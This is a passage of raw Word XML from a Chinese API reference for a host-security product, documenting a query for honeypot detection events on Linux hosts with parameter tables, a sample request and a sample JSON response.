      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF9499D"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15"/>
        <w:gridCol w:w="1273"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="4571"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="0D3DF8B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289CB80" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B50C193" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="341ED03D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D27719B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="36576BB5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D7A4651" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76E844C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47A263D9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BDD5D77" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6CD915F9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52CBD18D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7032DD0B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>DateRange</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A56F27E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24A1C396" w14:textId="1964218E" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>发现时间，格式参考</w:t>
            </w:r>
            <w:hyperlink w:anchor="通用get请求参数类型及说明">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>通用Get请求参数类型及说明</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="10755291" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F2CF268" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>clientIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A5C70D9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27621258" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="786687D1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>源IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="01511145" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FED3F0B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B9875F1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32F17C96" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75455EC1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>被攻击IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="533162B2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E1040FC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7099D0DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57EEF1BC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04BC9F21" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="28A418DD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5A93BA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/honeypot/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux?page</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=0&amp;size=50&amp;groups=1,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE21E50" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B1B170" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "70db8ef89e9ae79a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.159.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connectionIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.159.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "未分组主机（Linux）",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "安装了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DNSmasq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "hostname",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "time": 1528979258,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>clientIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.168.1.190",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "port": 11,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whiteRuleEffect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF0EF61"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694"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="2775"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="2F46532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51C1FFA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23037517" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56AFC0D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F857E2D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7093FC31" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37F19C1F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AFF22A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38E084BB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1850D8A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机ID，16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3ACA6AEB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="783EE43A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FC66BCD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A224C26" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30D01BE2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2CCE9768" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02748D98" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C68B9FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68B3FA79" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B9CE373" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="72C1CDCE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C934873" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="094F2B30" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D3887E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CC1D2D3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4CD352BA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="100139EC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A17BD5F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BC8A68D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BAA3C2C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2B71BEFB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62199564" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A8505C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C3B8513" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="026D0552" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6270B74B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45B872C2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50176992" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D39F1DD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23006D60" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="43F81768" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="193493A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="111184F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68262DD9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
